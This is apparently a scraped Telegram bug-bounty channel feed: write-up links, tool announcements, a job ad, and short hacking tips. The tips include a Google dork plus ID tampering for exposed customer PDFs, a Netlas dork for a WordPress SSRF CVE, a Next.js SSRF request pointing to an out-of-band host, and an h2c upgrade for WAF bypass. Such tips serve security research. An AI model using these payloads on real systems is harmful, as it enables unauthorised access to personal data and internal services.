FROM INTERNET
1)A Simple Supply Chain Bug — Worth $11,850 — How GitLab Reinforces Trust in Open Source
https://medium.com/@justas_b1/a-simple-supply-chain-bug-worth-11-850-how-gitlab-reinforces-trust-in-open-source-424585c79074
2)First IDOR Via Response Manipulation worth $750
https://infosecwriteups.com/this-is-how-i-got-750-from-my-first-idor-8058061c65ba
3)Accessing Employee GitHub SSH Key
https://ghostman01.medium.com/accessing-employee-github-ssh-key-4e125faba413
4)Shared Invitation Hash Leads To Account Takeover
https://one33se7en.medium.com/shared-invitation-hash-leads-to-account-takeover-5fd0ecb3994e
5)How I Was Able to Take Over Accounts Without Email or Password
https://medium.com/@zyad_ibrahim333/how-i-was-able-to-take-over-accounts-without-email-or-password-5d7434d7a049
6)The One-Man APT, Part I: A Picture That Can Execute Code on the Target
https://hackers-arise.com/the-one-man-apt-part-i-a-picture-that-can-execute-code-on-the-target/
7)Blind SSRF Found on a Public Bug Bounty Target
https://medium.com/@Abood_XHacker/blind-ssrf-found-on-a-public-bug-bounty-target-f9ae1fcc9494
8)Katana to Kill‑Switch: Mastering ProjectDiscovery’s Crawler From Zero to Pro (with Real‑World Scenarios)
https://adce626.medium.com/katana-to-kill-switch-mastering-projectdiscoverys-crawler-from-zero-to-pro-with-real-world-62a7dec5a744
9)7 Realistic VAPT & Bug Bounty Triage Interview Questions (With Answers) Part 2
https://medium.com/@cybersenpai/7-realistic-vapt-bug-bounty-triage-interview-questions-with-answers-part-2-9238b55f7af9
10)The Free URL Scanner That Saves Me Hours (CyScan.io)
https://kd-200.medium.com/the-free-url-scanner-that-saves-me-hours-cyscan-io-8909c26188e3
1)A Simple Supply Chain Bug — Worth $11,850 — How GitLab Reinforces Trust in Open Source
https://medium.com/@justas_b1/a-simple-supply-chain-bug-worth-11-850-how-gitlab-reinforces-trust-in-open-source-424585c79074
2)First IDOR Via Response Manipulation worth $750
https://infosecwriteups.com/this-is-how-i-got-750-from-my-first-idor-8058061c65ba
3)Accessing Employee GitHub SSH Key
https://ghostman01.medium.com/accessing-employee-github-ssh-key-4e125faba413
4)Shared Invitation Hash Leads To Account Takeover
https://one33se7en.medium.com/shared-invitation-hash-leads-to-account-takeover-5fd0ecb3994e
5)How I Was Able to Take Over Accounts Without Email or Password
https://medium.com/@zyad_ibrahim333/how-i-was-able-to-take-over-accounts-without-email-or-password-5d7434d7a049
6)The One-Man APT, Part I: A Picture That Can Execute Code on the Target
https://hackers-arise.com/the-one-man-apt-part-i-a-picture-that-can-execute-code-on-the-target/
7)Blind SSRF Found on a Public Bug Bounty Target
https://medium.com/@Abood_XHacker/blind-ssrf-found-on-a-public-bug-bounty-target-f9ae1fcc9494
8)Katana to Kill‑Switch: Mastering ProjectDiscovery’s Crawler From Zero to Pro (with Real‑World Scenarios)
https://adce626.medium.com/katana-to-kill-switch-mastering-projectdiscoverys-crawler-from-zero-to-pro-with-real-world-62a7dec5a744
9)7 Realistic VAPT & Bug Bounty Triage Interview Questions (With Answers) Part 2
https://medium.com/@cybersenpai/7-realistic-vapt-bug-bounty-triage-interview-questions-with-answers-part-2-9238b55f7af9
10)The Free URL Scanner That Saves Me Hours (CyScan.io)
https://kd-200.medium.com/the-free-url-scanner-that-saves-me-hours-cyscan-io-8909c26188e3
❤17
🔥 Find All Parameters - Tool to crawl pages, find potential parameters and generate a custom target parameter wordlist
✅ https://github.com/ImAyrix/fallparams
✅ https://github.com/ImAyrix/fallparams
🔥17👍12❤1
Hey Hunter's,
DarkShadow here back again, just dropping a list of queries.
30K+ Search Queries 🚀
(Google | Shodan | FOFA)
For hunters, red teamers & OSINT warriors:
⚡ Hunt faster
⚡ Spot misconfigurations instantly
⚡ Scan the global surface with precision
GitHub →https://github.com/projectdiscovery/awesome-search-queries
Show your love Guy's ❤️
#bugbountytips #osint
DarkShadow here back again, just dropping a list of queries.
30K+ Search Queries 🚀
(Google | Shodan | FOFA)
For hunters, red teamers & OSINT warriors:
⚡ Hunt faster
⚡ Spot misconfigurations instantly
⚡ Scan the global surface with precision
GitHub →https://github.com/projectdiscovery/awesome-search-queries
Show your love Guy's ❤️
#bugbountytips #osint
🔥11❤7👍5😱4
Brut Security
⚡BrutDroid 2.0 is a powerful, Windows-optimized toolkit designed specifically for Android Studio, streamlining the setup of a mobile penetration testing lab. Built to make Android pentesting effortless, it automates emulator creation, rooting, Frida server…
Linux Support Will Added Soon!
❤9🔥5👍4
We’re looking for a talented Full Stack Developer with strong MERN stack skills and hands-on experience in cloud deployment, CI/CD, DevOps, and DevSecOps.
What you’ll do:
1. Build and maintain frontend & backend applications
2. Deploy to cloud (AWS/Azure/GCP)
3. Set up and manage CI/CD pipelines
4. Implement DevOps & DevSecOps best practices
What we’re looking for:
1. MERN stack expertise (MongoDB, Express, React, Node)
2. Cloud deployment experience
3. CI/CD, Docker/Kubernetes knowledge
4. Familiarity with DevOps & DevSecOps principles
Experience required:
1. Minimum 1-2 years in IT infrastructure management, development and implementation.
2. Also expertise in git & github actions
✅Send Resume info@ncybersecurity.com
📍Remote, Preferably Kolkata, India 🇮🇳
What you’ll do:
1. Build and maintain frontend & backend applications
2. Deploy to cloud (AWS/Azure/GCP)
3. Set up and manage CI/CD pipelines
4. Implement DevOps & DevSecOps best practices
What we’re looking for:
1. MERN stack expertise (MongoDB, Express, React, Node)
2. Cloud deployment experience
3. CI/CD, Docker/Kubernetes knowledge
4. Familiarity with DevOps & DevSecOps principles
Experience required:
1. Minimum 1-2 years in IT infrastructure management, development and implementation.
2. Also expertise in git & github actions
✅Send Resume info@ncybersecurity.com
📍Remote, Preferably Kolkata, India 🇮🇳
❤6
Please open Telegram to view this post
VIEW IN TELEGRAM
⚡Autoswagger is a command-line tool designed to discover, parse, and test for unauthenticated endpoints using Swagger/OpenAPI documentation. It helps identify potential security issues in unprotected endpoints of APIs, such as PII leaks and common secret exposures.
✅https://github.com/intruder-io/autoswagger/
✅
❤14👍9
A fresh Web Pentesting batch with a Bug Bounty approach is starting this week.
📱 If you're interested DM on whatsapp- wa.link/brutsecurity
📱 If you're interested DM on whatsapp- wa.link/brutsecurity
🔥1
Brut Security pinned «A fresh Web Pentesting batch with a Bug Bounty approach is starting this week. 📱 If you're interested DM on whatsapp- wa.link/brutsecurity»
✅ For Faster Info Gathering
nuclei -list targets.txt -ai "Extract page noscript, detech tech and versions"
nuclei -list targets.txt -ai "Extract email addresses from web pages"
nuclei -list targets.txt -ai "Extract all subdomains referenced in web pages"
nuclei -list targets.txt -ai "Extract all external resource URLs (CDNs, images, iframes, fonts) from HTML"
nuclei -list targets.txt -ai "Extract social media profile links from web pages"
nuclei -list targets.txt -ai "Extract links pointing to staging, dev, or beta environments from HTML"
nuclei -list targets.txt -ai "Extract all links pointing to PDF, DOCX, XLSX, and other downloadable documents"👍10❤8
Hey Hunter's,
DarkShadow here back again, just dropping a awesome dork that makes pure bounty!
Unauthenticated Access to Sensitive Customer Data via Google Dorking
✅Step to reproduce:
- dork:
site:*.target.com* "date of birth" ext:pdf
- Check if PDF file exposing customer data.
- Noticed the ID in the URL.
- if By changing the ID, you able to access other data.
Now guys let me know, you are want to know all dorks that make pure bounty?
If you guy's want then show your love, probably i made a tool for automation or post the method.
Follow for More x.com/darkshadow2bd
#bugbountytips #dork #idor
DarkShadow here back again, just dropping a awesome dork that makes pure bounty!
Unauthenticated Access to Sensitive Customer Data via Google Dorking
✅Step to reproduce:
- dork:
site:*.target.com* "date of birth" ext:pdf
- Check if PDF file exposing customer data.
- Noticed the ID in the URL.
- if By changing the ID, you able to access other data.
Result: IDOR+Sensitive info leak (such as customer data)
Now guys let me know, you are want to know all dorks that make pure bounty?
If you guy's want then show your love, probably i made a tool for automation or post the method.
Follow for More x.com/darkshadow2bd
#bugbountytips #dork #idor
🔥11❤10👍6🫡3
CVE-2025-8085: SSRF in Ditty WordPress plugin, 8.6 rating❗️
The vulnerability allows attackers without authentication to make requests to arbitrary URLs.
Search at Netlas.io:
👉 Link: https://nt.ls/HthP0
👉 Dork: http.body:"plugins/ditty-news-ticker"
Read more: https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
The vulnerability allows attackers without authentication to make requests to arbitrary URLs.
Search at Netlas.io:
👉 Link: https://nt.ls/HthP0
👉 Dork: http.body:"plugins/ditty-news-ticker"
Read more: https://wpscan.com/vulnerability/f42c37bb-1ae0-49ab-bd81-7864dff0fcff/
👍8🤝1
Hey Hunter's,
DarkShadow here back again, dropping a critical SSRF 💥
Nextjs SSRF in Middleware header!
✅POC:
If you guy's really enjoy to read, then show your love and follow me x.com/darkshadow2bd
#ssrf #bugbountytips
DarkShadow here back again, dropping a critical SSRF 💥
Nextjs SSRF in Middleware header!
✅POC:
GET / HTTP/1.1
Host: target. com
Location: http://oast. me
X-Middleware-Rewrite: http://oast. me
If you guy's really enjoy to read, then show your love and follow me x.com/darkshadow2bd
#ssrf #bugbountytips
👏18❤14🔥4🗿1
Hey Hunter's,
DarkShadow here back again!
Check your burp isn't this feature is enable?
Most of hackers miss this thing. So, this is a great opportunity to make bounty using this burp feature.
#bugbountytips #burp
DarkShadow here back again!
Check your burp isn't this feature is enable?
Most of hackers miss this thing. So, this is a great opportunity to make bounty using this burp feature.
#bugbountytips #burp
1❤8👏7👍4🔥2
🪲 Bug Bounty Pro Tip: #H2C Upgrade Bypass
Target: Applications using HTTP/2 Cleartext (h2c) upgrades.
The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.
How to Test:
1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).
2. Send an initial HTTP/1.1 request with the upgrade header:
3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.
4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.
Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.
#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
Target: Applications using HTTP/2 Cleartext (h2c) upgrades.
The Core Idea: Many Web Application Firewalls (WAFs) and reverse proxies process HTTP/1.1 but fail to correctly inspect traffic after it's upgraded to HTTP/2.
How to Test:
1. Find a target that accepts an Upgrade: h2c header (common in Java, gRPC, and some reverse proxies like Nginx).
2. Send an initial HTTP/1.1 request with the upgrade header:
GET / HTTP/1.1
Host: example.com
Upgrade: h2c
Connection: Upgrade
3. If the server agrees (responds with HTTP/1.1 101 Switching Protocols), the connection is now HTTP/2.
4. The Bypass: Craft and send malformed or smuggled HTTP/2 frames (e.g., with the :method header set to GET or POST). The downstream WAF may not parse this, allowing you to access internal endpoints or bypass security controls.
Why it works: The security boundary often only exists at the HTTP/1.1 layer. Once upgraded, your HTTP/2 traffic might be forwarded directly to the backend without inspection.
#BugBounty #Hacking #WebSecurity #WAFBypass #HTTP2
1🔥29❤14👍5